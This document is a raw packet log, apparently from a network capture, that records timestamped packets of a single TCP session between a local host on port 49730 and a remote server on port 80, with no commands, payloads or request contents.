Sep 26, 2024 00:39:14.357208014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357218981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357227087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.357232094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357244015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357264996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.357284069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.357287884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357300043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357311010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357321978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357332945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357345104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.357352018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.357352018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.357393980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.357425928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397252083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397285938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397305012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397315979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397326946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397330046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397337914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397350073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397360086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397371054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397382975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397392035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397404909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397413015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397413015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397463083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397475004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397486925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397499084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397510052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.397551060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.397551060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.405402899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405447960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405458927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405481100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.405489922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405510902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.405514956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405538082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.405563116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.405620098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405631065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405642033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.405673027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.405700922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.443461895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.443480968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.443556070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.443556070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.476783991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.476819992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.476830959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.476871967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.476871967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.476970911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.476984024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.477062941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.477107048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.477118969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.477158070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.479407072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.479419947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.479427099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.479470015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.479497910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481127024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481213093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481215000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481225014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481266975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481291056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481292009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481398106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481405973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481410980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481445074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481462955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481563091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481575966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481592894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481605053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481616974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481626034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481626987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481640100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481652021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481674910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481700897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481700897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481738091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481750965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481784105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481805086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481815100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481826067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481837988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481848955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481862068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481863976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481895924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481920004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481920958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481931925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481945038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481956005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.481966019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.481982946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.482003927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.482064962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.486841917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.486871004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.486906052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.486906052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.489764929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.489777088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.489788055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.489870071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.489872932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.489885092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.489895105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.489933968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.489933968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.530040026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530060053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530071020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530083895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530097008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530107021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530119896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.530122042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.530177116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.600794077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.600816965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.600826979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.600855112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.600949049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.600961924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.600975037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.600986958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.600997925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.601033926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.601033926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.603635073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.603647947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.603660107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.603729963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.603729963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605480909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605494022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605505943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605518103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605581999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605581999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605742931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605755091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605766058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605777025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605787992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605798960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605808973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605819941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605823994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605823994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605830908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605844021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605854034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605865955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605871916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605871916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605876923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605889082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605901003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605914116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605916977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605916977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605923891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.605961084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.605961084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.606259108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606276989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606287956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606297970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606308937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606318951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606328964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606338024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.606353998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.606353998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.606539965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.841948986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.841976881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.841991901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842001915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842015028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842027903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842030048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842041016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842060089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842114925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842147112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842159033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842170954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842210054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842211008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842222929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842225075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842236042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842247963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842258930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842268944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842271090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842286110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842292070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842298031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842309952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842329979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842355967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842355967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842365026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842377901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842391968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842427015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842437983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842443943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842443943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842452049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842462063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842473030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842485905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842494965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842503071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842503071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842520952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842600107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842633009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842643976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842654943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842665911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842675924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842685938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842698097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842709064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842717886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842717886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842720985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842756033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842756033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842926979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842938900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842950106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842959881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842971087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842978954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.842983007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.842997074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843013048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843014956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843038082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843050957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843055010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843055010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843064070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843074083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843077898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843087912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843095064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843101025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843111992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843122005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843127012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843127012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843136072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843192101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843192101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843216896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843229055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843240023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843250990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843261957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843271017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843271971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843290091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843301058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843312979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843317986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843317986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843326092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843338013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843353033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843353033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843389988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843466043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843477964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843488932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843497992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843508959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843516111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843521118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843533039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843540907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843544006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843554974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843565941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843575954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843576908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843576908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843610048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843615055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.843643904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.843652964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.849646091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.849658012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.849690914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.849703074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.849713087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.849721909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.849721909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.849725962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.849783897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.849783897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.851901054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.851939917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.851949930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:14.851955891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:14.851999998 CEST	49730	80	192.168.2.4	185.215.113.37
